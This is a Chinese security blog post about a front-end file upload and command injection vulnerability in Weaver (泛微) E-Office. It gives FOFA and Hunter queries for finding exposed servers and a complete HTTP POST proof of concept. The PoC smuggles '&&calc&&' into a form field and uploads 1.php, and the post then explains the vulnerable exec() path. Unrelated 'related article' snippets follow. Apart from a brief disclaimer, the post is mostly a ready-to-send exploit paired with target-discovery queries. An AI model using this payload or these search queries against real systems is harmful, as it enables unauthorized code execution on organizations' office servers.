泛微E-Office前台文件上传漏洞

news/2024/10/18 7:58:45/

0x01 阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 漏洞描述

(一) 泛微E-Office

泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。

图片

FOFA语法:

app=“泛微-EOffice”
hunter语法:

app.name=“泛微 e-office OA”
hunter共2,919条资产

图片

(二) 漏洞poc

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 
ontent-Length: 328
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1ZCUAAAXxnYuVIZR
Accept: */*
Origin: http://172.16.10.124
Referer: http://172.16.10.124/general/file_folder/file_new/neworedit/index.php?FILE_SORT=1&func_id=7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: LOGIN_LANG=cn; PHPSESSID=16a132db599e8d54a45e704389a29686
Connection: close------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="name"1&&calc&&copy nul a.doc
------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="Filedata"; filename="1.php"
Content-Type: application/mswordhello
------WebKitFormBoundary1ZCUAAAXxnYuVIZR--

图片

访问上传的目录/attachment/1460971852/1.php
在这里插入图片描述

(三) 漏洞原理

利用功能出现在/webroot/inc/utility_all.php的1007-1008行中。自定义函数doc2txt()nater exec()函数,$路径变量是由用户无限制控制的,可用于使用命令连接符号“ &&”注入任意命令。

该漏洞触发点位于/webroot/general/file_folder/global_search.php文件中。我们在第108行调用doc2text(),然后追溯到doc2txt()参数$FILE_PATH的源,连接附件目录(C:\eoffice9\webroot\ATTACHMENT) 的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获得完整的文件路径。


http://www.ppmy.cn/news/598183.html

相关文章

自动驾驶曙光再现

我们为助力AI更快落地,推出了“AI购”平台,拥有多类别的AI技术,同时传递着AI的最新动态。近日,百度 Apollo 首批获得武汉、重庆等城市的无人化示范运营资格,这意味着无人驾驶汽车可以对外服务并收取费用,更…

中科曙光 量子计算机,中科曙光 量子计算机 量子计算机的曙光

量子力学是一门高深莫测的学科,离普通人很远,但正因为有了它,催生了现代半导体技术,从而有了大家都不离不开的电脑。现在,这门神奇的学科将再次登场,用最新的量子计算机来改变世界。 量子计算机是什么&…

拯救苹果。

文章目录 拯救苹果游戏截图代码展示素材领取 拯救苹果 拯救苹果&#xff0c;快来拯救属于你的那个苹果吧&#xff01; C、easyx合力打造小游戏&#xff0c;按键2切换音乐并加快游戏进度&#xff0c;按键1恢复游戏进度并切换音乐。 游戏截图 代码展示 #include <stdio.h>…

曙光就在眼前

OCP考试还剩下最后一门TUNING了&#xff0c;刚刚看完复习的“资料”。毕竟是刚刚培训过没两天&#xff0c;这门看起来还是印象蛮深刻的&#xff0c;现在就是在存储空间管理上我还是有点犯迷糊&#xff0c;特别是字典管理和本地管理&#xff0c;这也是我回去之后要努力加强的方向…

“曙光很近 理想不远” | 中科曙光发布全新Slogan

点击上方关注我们! 7月6日&#xff0c;国内信息技术产业领军企业中科曙光发布全新Slogan“曙光很近&#xff0c;理想不远”&#xff0c;正式开启新形势下的品牌升级。 在与新Slogan同时发布的宣传片中&#xff0c;中科曙光从技术、产品、质量、服务、信念5个维度诠释新Slogan的…

国内外主要黑苹果论坛一览(修正版)

国产&#xff1a; 远景论坛&#xff1a; http://bbs.pcbeta.com/forum.php 国外&#xff1a; 1.insanelymac http://www.insanelymac.com/ 从论坛进入&#xff08;有中文滴&#xff09; http://www.osx86project.org 点评&#xff1a;个人认为最好的黑苹果论坛。可惜只有e文…

【2023/05/14】Apple I

Hello&#xff01;大家好&#xff0c;我是霜淮子&#xff0c;2023倒计时第9天。 Share I cannot choose the best.The best choose me. 译文&#xff1a; 我不能选择那最好的。 是那最好的选择我。 They throw their shadows before them who carry their lantern on thei…

2022 - 曙光乍现

2022 年的年尾已至&#xff0c;从 2019 的那一天开始&#xff0c;疫情已经走过了完整的三周年。回顾疫情的这三年&#xff0c;从心理的感受来讲&#xff0c;仿佛已经度过了极为漫长的一段时间&#xff0c;久到已经忘了以前的生活是什么样子了。防疫政策从之前的严防死守在短短的…